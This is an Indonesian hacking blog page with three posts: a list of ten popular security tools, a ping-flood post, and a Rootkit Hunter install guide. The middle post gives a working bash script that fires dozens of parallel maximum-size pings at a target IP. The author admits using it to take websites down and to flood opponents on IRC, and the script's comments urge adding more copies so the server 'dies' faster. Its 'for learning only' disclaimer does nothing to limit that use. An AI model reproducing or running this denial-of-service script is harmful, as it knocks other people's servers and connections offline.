Nov
4th

10 Tool Favorit Hacker

Files under Hacking | 28 Comments

Pembuat NMAP melakukan survei 100 tools favorit terhadap pengikut milis nmap-hackers. Sekitar 3,243 user memberikan suaranya untuk tool yang paling mereka gemari. Daftar 100 tool favorit para hacker ini dapat ditemukan jg di www.insecured.org

Dari 100 tool tersebut, berikut dibawah ini adalah 10 tools favorit yang mendapat suara terbanyak sepanjang tahun 2006. Tool tersebut merupakan senjata yang dianggap mutlak diperlukan dalam aktivitas hacking dan sekuriti.

1.Nessus

“Nessus” pertama kali dibuat oleh Renaud Deraison pada tahun 1998 dan disebarkan untuk komunitas internet secara bebas, bermanfaat, ter-update dengan baik serta mudah untuk digunakan.

Nessus adalah sebuah program untuk mencari kelemahan pada sebuah sistem komputer. Menurut situs resminya di www.nessus.org, tool ini telah digunakan oleh lebih dari 75.000 organisasi dan perusahaan di seluruh dunia.

2.Snort

Snort adalah sebuah IDS, yaitu tool untuk mencegah dan mendeteksi serangan terhadap sistem komputer. Vendor dari snort mengklaim bahwa tool ini telah didownload berjuta-juta kali dari situs mereka. Anda mungkin berminat untuk mencobanya, silahkan download tool ini di www.snort.org.

3.Kismet

Kismet adalah sebuah tool untuk mendeteksi koneksi wireless(mendukung lalu lintas 802.11b, 802.11a, dan 802.11g ) , menangkap paket dalam sebuah sistem jaringan dan menjadi sebuah IDS (intrusion detection System).

Untuk mencari tahu lebih lanjut mengenai kismet, anda dapat mengunjungi situs http://www.kismetwireless.net atau masuk ke #kismet irc.freenode.net.

4.Metasploit Framework

Metasploit Framework adalah sebuah proyek open source untuk mengembangkan, menguji dan menggunakan kode eksploit. Dibuat dengan bahasa Perl sebagai fondasi dasar dan dan terdiri dari komponen pelengkap yang telah dicompile dengan bahasa C, assembler dan Python. Metasploit Framework dapat berjalan pada sistem operasi UNIX, Linux dan Windows. Keterangan yang lebih detail dapat anda cari di http://www.metasploit.com.

5.Netcat

Netcat adalah sebuah tool networking utility yang dapat membaca dan menulis data pada koneksi sebuah jaringan melalui protokol TCP/IP.

Fitur yang terdapat pada Netcat antara lain :

  • Koneksi keluar dan masuk melalui protokol UDP ataupun TCP dengan port yang digunakan..

  • Tunneling mode, tunneling dari UDP ke TCP, memetakan parameter dalam jaringan (source port/interface, listening port/interface, dan mengijinkan remote host melakukan koneksi ke tunnel)

  • Port scanner, untuk mendeteksi port yang terbuka.

  • Buffered send-mode dan hexdump RFC854 telnet.

6.Hping

Hping merupakan sebuah tool serba guna. Tool ini dapat digunakan untuk menguji kemampuan firewall, mencari port yang terbuka, menguji keamanan jaringan dengan menggunakan berbagai jenis protokol, mendapatkan informasi sistem operasi, mengevaluasi protokol TCP/IP.

7.TCPDump

Tcpdump juga merupakan sebuah sniffer. Admin jaringan menggunakan tool ini untuk memonitor lalu lintas dan menganalisa permasalahan jika terjadi gangguan. Menurut informasi di http://www-iepm.slac.stanford.edu/monitoring/passive/tcpdump.html , Tcpdump menggunakan paket filter dari UNIX BSD untuk meng-capture data(BPF / BSD Packet Filter).BPF menerima salinan dari driver pengirim dan penerima paket.Pengguna tcpdump juga dapat menyaring paket sesuai dengan keinginan.

8. John The Ripper

Sebuah password cracker dari jaman nenek moyang para hacker yang masih menjadi 10 besar tool favorit. Berikut adalah keterangan dari pembuat John The Ripper.

John the Ripper is a password cracker, currently available for UNIX, DOS,WinNT/Win95. Its primary purpose is to detect weak UNIX passwords. It has been tested with Linux x86/Alpha/SPARC, FreeBSD x86, OpenBSD x86, Solaris 2.x SPARC and x86, Digital UNIX, AIX, HP-UX, and IRIX”.

9. Cain And Abel

Cain & Abel adalah sebuah tool untuk masalah password. Tool ini dapat mengumpulkan password dengan metode network sniffing, meng-crack password menggunakan Dictionary attack, Brute-Force and Cryptanalysis attacks, merekam pembicaraan VoIP (Voice Over Internet Protocol), meng-crack jaringan wireless, menganalisa trafik dalam jaringan. www.oxid.it

10. WireShark / Ethereal

Wireshark / Ethereal adalah sebuah tool untuk menganalisa protokol jaringan. Fungsinya juga sebagai sebuah sniffer. Memantau lalu lintas internet. Wireshark

dapat berjalan pada Windows, MAC OS X, dan Linux. www.wireshark.org

Tertarik? Pelajari dan pahami saja cara penggunaan 10 tool tsb. Kita memang tdk akan semudah itu menjadi hacker hebat hanya dengan mengandalkan 10 tool diatas. Tapi tool2 tsb sudah diakui oleh semua tingkatan Hacker. Kan bisa menjadi tambahan bagi anda2 yang ingin menggeluti sekuriti komputer secara mendalam.

Diterjemahkan dari: www.insecured.org

Oct
20th

Flood IP sampai mampus

Files under Hacking | 6 Comments

Ini adalah artikel lama gw, dulu sering saya gunakan untuk memflood IP web agar down atau memflood musuh di IRC. Artikel ini hanya untuk pembelajaran jadi jangan digunakan untuk menjahili orang lain.

buat file Ping Flood nya terlebih dahulu

sudo nano ping_flood

#!/bin/bash
echo;
echo "Ping Flooding by PakTani (hanya untuk pembelajaran)";
echo "Host Yang akan di Flood:"; read host;
echo;

i="ping -s 65507 $host"

#Silakan perbanyak lagi tulisan $i& berikut biar server lebih cepet
mampus..!!!

$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i
&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i
&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i
&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i
&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i
&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i
&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i
&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i
&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i&$i

simpan file diatas ($host ganti dengan ip target)
kemudian rubah permisionnya
sudo chmod +x ping_flood
jalankan
#./ping_flood
Oct
14th

Menjaga Server secara Instan dan Mudah

Files under Hacking, Ubuntu | Leave Comment

Menjaga server tetap aman itu penting. Cuman kadang mempelajari security bukan perkara yang mudah. beruntung ada om michael boelen yang bikin tools instan di linux, untuk memeriksa keamanan server pc linux kita tercinta. tugasnya menscan hole, backdoor dan berbagai kelemahan sistem kita. Namanya Rootkit Hunter.
Rootkit scanner is scanning tool to ensure you for about 99.9%* you’re clean of nasty tools. This tool scans for rootkits, backdoors and local exploits by running tests like:

- MD5 hash compare
- Look for default files used by rootkits
- Wrong file permissions for binaries
- Look for suspected strings in LKM and KLD modules
- Look for hidden files
- Optional scan within plaintext and binary files

Rootkit Hunter is released as GPL licensed project and free for everyone to use.

* No, not really 99.9%.. It’s just another security layer

proyek open sourcenya ini bisa didownload di: www.rootkit.nl

Ok Sekarang kita coba instal di Ubuntu

rozy@Forbiden:~$ sudo apt-get install rkhunter

untuk menjalankannya tinggal ketik sudo rkhunter-c

be happy!! btw jangan ngerusak sistem orang lain ya :) kasian. mereka juga manusia, punya hati dan punya rasa..